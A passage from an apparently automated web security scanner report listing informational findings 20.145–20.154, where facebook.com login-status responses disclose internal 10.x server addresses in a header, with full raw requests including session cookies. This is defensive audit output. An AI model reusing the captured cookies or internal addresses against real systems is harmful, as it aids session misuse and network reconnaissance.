Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f180e268e&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1d34d522&relation=parent&transport=postmessage&frame=f88c00b6c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.104.49
X-Cnection: close
Date: Thu, 05 May 2011 02:13:52 GMT
Content-Length: 0


20.145. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.36.137.112

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df334a31b5c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff23a0be258%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df146768fcc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff23a0be258%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2faff4c4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3f2eab97c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff23a0be258%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2faff4c4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2cf8e976%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff23a0be258%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2faff4c4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1aafbdd8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff23a0be258%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2faff4c4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2cf8e976&origin=http%3A%2F%2Faol.sportingnews.com%2Ff23a0be258&relation=parent&transport=postmessage&frame=f2faff4c4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.137.112
X-Cnection: close
Date: Thu, 05 May 2011 01:12:27 GMT
Content-Length: 0


20.146. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.99.132

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2797cb52c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff101400a08%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f8847d6c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff101400a08%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20dbd20dc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f33a7a28%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff101400a08%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20dbd20dc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df16a89b1b%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff101400a08%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20dbd20dc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24b64d48%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff101400a08%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20dbd20dc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f16a89b1b&origin=http%3A%2F%2Faol.sportingnews.com%2Ff101400a08&relation=parent&transport=postmessage&frame=f20dbd20dc
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.99.132
X-Cnection: close
Date: Thu, 05 May 2011 01:11:16 GMT
Content-Length: 0


20.147. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.99.33

Request

GET /extern/login_status.php?api_key=4d965afccc4d86c598dbf5d94fb34a7c&app_id=4d965afccc4d86c598dbf5d94fb34a7c&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d877e6fc%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff157f8d8cc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df37a093e68%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff157f8d8cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1510b850%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df37e50a17%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff157f8d8cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1510b850&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df8cec36a8%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff157f8d8cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1510b850&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df85497aac%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff157f8d8cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1510b850&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f8cec36a8&origin=http%3A%2F%2Fwww.huffingtonpost.com%2Ff157f8d8cc&relation=parent&transport=postmessage&frame=f1510b850
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.99.33
X-Cnection: close
Date: Thu, 05 May 2011 00:58:29 GMT
Content-Length: 0


20.148. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.75.45

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df39e00980c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36efa557%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df182b0941%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36efa557%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb5fcd92c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df25432244%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36efa557%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb5fcd92c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3ee59b8cc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36efa557%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb5fcd92c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df392643228%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff36efa557%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb5fcd92c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3ee59b8cc&origin=http%3A%2F%2Faol.sportingnews.com%2Ff36efa557&relation=parent&transport=postmessage&frame=fb5fcd92c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.75.45
X-Cnection: close
Date: Thu, 05 May 2011 00:58:14 GMT
Content-Length: 0


20.149. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.153.41

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2e3bc9dd%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff140aba3e%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df35e3b1404%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff140aba3e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d1cd54bc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3818e431%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff140aba3e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d1cd54bc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df7995381%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff140aba3e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d1cd54bc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df318074f84%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff140aba3e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d1cd54bc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f7995381&origin=http%3A%2F%2Faol.sportingnews.com%2Ff140aba3e&relation=parent&transport=postmessage&frame=f2d1cd54bc
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.153.41
X-Cnection: close
Date: Thu, 05 May 2011 01:36:23 GMT
Content-Length: 0


20.150. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.139.130

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3a18eb0dc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc7e9566%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df7bee6804%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc7e9566%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13fc7349c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d82a929%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc7e9566%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13fc7349c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfdcc85d5c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc7e9566%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13fc7349c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df18609b7c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc7e9566%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13fc7349c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=fdcc85d5c&origin=http%3A%2F%2Faol.sportingnews.com%2Ffc7e9566&relation=parent&transport=postmessage&frame=f13fc7349c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.139.130
X-Cnection: close
Date: Thu, 05 May 2011 01:11:02 GMT
Content-Length: 0


20.151. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.105.110

Request

GET /extern/login_status.php?api_key=187288694643718&app_id=187288694643718&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23d3f18fc%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff399faa324%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d7714834%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff399faa324%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b2efe228%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df22ae28564%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff399faa324%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b2efe228&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df31ba05c14%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff399faa324%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b2efe228&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df18da12388%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff399faa324%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b2efe228&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f31ba05c14&origin=http%3A%2F%2Ftechcrunch.com%2Ff399faa324&relation=parent&transport=postmessage&frame=f2b2efe228
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.105.110
X-Cnection: close
Date: Thu, 05 May 2011 02:00:28 GMT
Content-Length: 0


20.152. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.42.55

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1ff374a8c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc2236fd%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df28c078fa%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc2236fd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df228c06be4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3244212b4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc2236fd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df228c06be4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3160d2048%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc2236fd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df228c06be4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df9099c74%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffc2236fd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df228c06be4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3160d2048&origin=http%3A%2F%2Faol.sportingnews.com%2Ffc2236fd&relation=parent&transport=postmessage&frame=f228c06be4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.42.55
X-Cnection: close
Date: Thu, 05 May 2011 01:20:54 GMT
Content-Length: 0


20.153. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.99.110

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfd683b66%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2c8e36384%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df137160ec%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2c8e36384%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3111b523c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df114f9be9c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2c8e36384%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3111b523c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d49b6a2c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2c8e36384%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3111b523c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df34e95eb3%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2c8e36384%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3111b523c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2d49b6a2c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2c8e36384&relation=parent&transport=postmessage&frame=f3111b523c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.99.110
X-Cnection: close
Date: Thu, 05 May 2011 02:04:10 GMT
Content-Length: 0


20.154. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.53.32.23

Request

